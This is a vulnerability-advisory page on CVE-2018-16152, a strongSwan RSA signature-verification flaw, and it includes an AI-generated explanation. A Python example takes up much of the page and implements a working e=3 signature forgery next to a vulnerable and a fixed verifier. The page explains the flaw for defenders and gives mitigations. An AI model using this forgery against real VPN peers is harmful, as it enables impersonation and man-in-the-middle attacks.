VYPR
Unrated severity · NVD Advisory · Published Sep 26, 2018 · Updated Dec 3, 2025

CVE-2018-16152

Description

Insufficient ASN.1 parsing in strongSwan's GMP RSA plugin allows Bleichenbacher-style signature forgery when small public exponents are used.

AI Insight

LLM-synthesized narrative grounded in this CVE's description and references.

Vulnerability

The verify_emsa_pkcs1_signature() function in gmp_rsa_public_key.c, part of strongSwan's GMP-based RSA plugin (versions 4.x and 5.x before 5.7.0), verifies PKCS#1 v1.5 signatures by parsing the DigestInfo structure recovered from the signature. It does not reject excess data in the digestAlgorithm.parameters field, which for the usual hash algorithm identifiers must be absent or NULL, so the bytes placed there are skipped instead of causing a verification failure. A remote attacker can therefore forge RSA signatures when the key uses a small public exponent (e.g., e=3). The issue is a variant of CVE-2006-4790 and CVE-2014-1568 [1], [2].

Exploitation

The attacker needs the target's RSA public key (normally available from its certificate) and network access to a strongSwan peer that uses the GMP plugin with an RSA key whose public exponent is small, such as e=3. The forgery exploits the lenient ASN.1 parsing in the signature verification code: the DER-encoded digestAlgorithm.parameters field is not required to be absent (or NULL) when the algorithm identifier takes no parameters, so any bytes placed there are consumed without being checked. With e=3 the attacker builds an encoded block that starts with the expected 00 01 FF ... 00 padding, ends with the correct digest of the message to be forged, carries attacker-chosen filler in the parameters field, and is a perfect cube of an integer smaller than the modulus; the integer cube root is then accepted as the signature, because raising it to the third power never wraps modulo n and reproduces the block exactly. No private key is involved [1]. The construction only works for small exponents: with e=65537 the value s^e is reduced modulo n and cannot be shaped this way.
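The following is an added example written for this page, not strongSwan's code. It models in Python the verification pattern the two paragraphs above describe (parse the recovered DigestInfo, skip digestAlgorithm.parameters), puts the strict full-encoding comparison that a correct verifier performs next to it, and carries out the e=3 forgery against a toy 2048-bit key. The seeded toy key generation, the use of an OCTET STRING as the carrier for the filler bytes, the SHA-256-only parser and the sample message are all assumptions made for this example; strongSwan's real parser handles a wider DigestInfo grammar. Because the digest sits at the end of the block, the cube-root construction needs the last digest byte to be odd, so the message is varied until that holds.

```python
# Added example (not strongSwan code): lenient vs strict PKCS#1 v1.5 verification and the e=3 forgery.
import hashlib
import random
SHA256_OID = bytes.fromhex("608648016503040201")    # 2.16.840.1.101.3.4.2.1, OID body only

def tlv(tag, body):
    n = len(body)                                  # DER length: short form below 128, else 0x81/0x82 prefix
    ln = bytes([n]) if n < 128 else b"\x81" + bytes([n]) if n < 256 else b"\x82" + n.to_bytes(2, "big")
    return bytes([tag]) + ln + body

def read_tlv(buf, pos):                            # minimal DER reader: returns (tag, body, next_pos)
    tag, ln, pos = buf[pos], buf[pos + 1], pos + 2
    if ln & 0x80:                                  # long form: the low 7 bits count the length bytes
        ln, pos = int.from_bytes(buf[pos:pos + (ln & 0x7F)], "big"), pos + (ln & 0x7F)
    return tag, buf[pos:pos + ln], pos + ln

def emsa_pkcs1_v15(digest, k):
    """EMSA-PKCS1-v1_5 for SHA-256 (RFC 8017 9.2): DigestInfo must carry NULL parameters."""
    t = tlv(0x30, tlv(0x30, tlv(0x06, SHA256_OID) + b"\x05\x00") + tlv(0x04, digest))
    return b"\x00\x01" + b"\xff" * (k - len(t) - 3) + b"\x00" + t

def is_probable_prime(n, rng, rounds=16):
    if n < 2 or any(n % p == 0 for p in (2, 3, 5, 7, 11, 13, 17, 19, 23, 29, 31, 37)):
        return n in (2, 3, 5, 7, 11, 13, 17, 19, 23, 29, 31, 37)
    r = ((n - 1) & (1 - n)).bit_length() - 1       # n - 1 = d * 2^r with d odd
    d = (n - 1) >> r
    for a in (rng.randrange(2, n - 1) for _ in range(rounds)):   # Miller-Rabin rounds
        x = pow(a, d, n)
        if x not in (1, n - 1) and all((x := x * x % n) != n - 1 for _ in range(r - 1)):
            return False
    return True

def gen_key(bits=2048, seed=2018):
    """Toy RSA key with e=3 (seeded only so the demo is reproducible; not for real use)."""
    rng, primes = random.Random(seed), []
    while len(primes) < 2:
        c = rng.getrandbits(bits // 2) | 1 << (bits // 2 - 1) | 1
        if c % 3 == 2 and is_probable_prime(c, rng):   # p = 2 mod 3 keeps e=3 invertible
            primes.append(c)
    p, q = primes
    return p * q, 3, pow(3, -1, (p - 1) * (q - 1))

def sign(n, d, msg):
    k = (n.bit_length() + 7) // 8
    return pow(int.from_bytes(emsa_pkcs1_v15(hashlib.sha256(msg).digest(), k), "big"), d, n).to_bytes(k, "big")

def verify_lenient(n, e, msg, sig):
    """Vulnerable pattern (as the CVE describes it): parse DigestInfo, skip parameters unchecked."""
    em = pow(int.from_bytes(sig, "big"), e, n).to_bytes((n.bit_length() + 7) // 8, "big")
    sep = em.find(b"\x00", 2)                      # end of the 0xFF padding run
    if em[:2] != b"\x00\x01" or sep < 10 or em[2:sep] != b"\xff" * (sep - 2):
        return False
    t0, di, _ = read_tlv(em, sep + 1)              # DigestInfo ::= SEQUENCE
    t1, alg, pos = read_tlv(di, 0)                 # digestAlgorithm ::= SEQUENCE
    t2, oid, apos = read_tlv(alg, 0)               # algorithm ::= OBJECT IDENTIFIER
    if (t0, t1, t2) != (0x30, 0x30, 0x06) or oid != SHA256_OID:
        return False
    if apos < len(alg):
        read_tlv(alg, apos)                        # BUG: parameters consumed but never inspected
    return read_tlv(di, pos)[:2] == (0x04, hashlib.sha256(msg).digest())   # digest ::= OCTET STRING

def verify_strict(n, e, msg, sig):
    """Fixed pattern (RFC 8017 8.2.2): rebuild the one valid encoding and compare every byte."""
    em = pow(int.from_bytes(sig, "big"), e, n).to_bytes((n.bit_length() + 7) // 8, "big")
    return em == emsa_pkcs1_v15(hashlib.sha256(msg).digest(), len(em))

def icbrt(x):
    """Floor cube root of a non-negative big int: Newton from above, then a one-step fix-up."""
    r = 1 << ((x.bit_length() + 2) // 3)
    while (nr := (2 * r + x // (r * r)) // 3) < r:
        r = nr
    while (r + 1) ** 3 <= x:
        r += 1
    return r

def forge(n, msg):
    """Bleichenbacher-style e=3 forgery: attacker-chosen filler lives in digestAlgorithm.parameters
    (an OCTET STRING here), between the fixed prefix and the fixed digest, and makes the block a cube."""
    k, digest = (n.bit_length() + 7) // 8, hashlib.sha256(msg).digest()
    if not digest[-1] & 1:
        raise ValueError("last digest byte must be odd: vary the message")
    suffix = tlv(0x04, digest)
    def layout(g):                                 # DigestInfo carrying g filler bytes in parameters
        return tlv(0x30, tlv(0x30, tlv(0x06, SHA256_OID) + tlv(0x04, b"\0" * g)) + suffix)
    glen = next(g for g in range(1, k) if 11 + len(layout(g)) == k)   # 11 = 00 01 + eight FF + 00
    di = layout(glen)
    prefix = int.from_bytes(b"\x00\x01" + b"\xff" * 8 + b"\x00" + di[:-(glen + len(suffix))], "big")
    lo, hi = 8 * len(suffix), 8 * (glen + len(suffix))   # bit positions where suffix / prefix start
    a = icbrt((prefix << hi) | 1 << (hi - 1))      # high half: aim at the middle of the prefix interval
    suf = int.from_bytes(suffix, "big")            # low half: cubing permutes the odd residues mod 2^lo,
    b = pow(suf, pow(3, -1, 1 << (lo - 2)), 1 << lo)   # so invert it with 3^-1 mod the group exponent
    s = (a >> lo << lo) | b                        # splice: s^3 now has both fixed ends, filler between
    assert s ** 3 < n and s ** 3 >> hi == prefix and s ** 3 % (1 << lo) == suf
    return s.to_bytes(k, "big")

def forgeable_message(template=b"attacker-chosen payload #%d"):
    """Constructed input: vary an attacker-controlled field until the digest's last byte is odd."""
    return next(template % i for i in range(256) if hashlib.sha256(template % i).digest()[-1] & 1)
```

Running gen_key(), signing a forgeable_message() with the private exponent and checking it with both verifiers shows a genuine signature passing both, while forge(n, msg) yields a value that verify_lenient accepts and verify_strict rejects. The forged value is roughly 680 bits long, so its cube is below the 2048-bit modulus and the verifier's modular exponentiation is an ordinary cube; that is why the attack needs a small exponent and why a key with e=65537 is not exposed to this particular construction. The strict verifier is the comparison RFC 8017 specifies and is the shape of fix a practitioner should look for when reviewing a PKCS#1 v1.5 implementation.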

Impact

Successful exploitation lets an attacker forge RSA signatures over data of their choosing and thus impersonate a legitimate peer when an RSA signature alone authenticates the IKEv2 exchange. The result is a loss of authentication integrity that can enable man-in-the-middle attacks or unauthorized access to the VPN [1].

Mitigation

The vulnerability is fixed in strongSwan 5.7.0, released on 2018-09-24; upgrade to that version or later. Gentoo GLSA 201811-16 recommends updating to 5.7.1 or later. Where upgrading is not immediately possible, exposure is reduced by using RSA keys with a larger public exponent (e.g., 65537) and/or by not loading the gmp plugin, so that another RSA backend (for example the openssl plugin) performs signature verification. It is worth checking the public exponent of deployed certificates and keys, since the forgery is only practical against small exponents. No other workaround is known [2].

AI Insight generated on May 25, 2026. Synthesized from this CVE's description and the cited reference URLs; citations are validated against the source bundle.

Affected products: 24

Patches: 0 (no patches discovered yet)

References: 8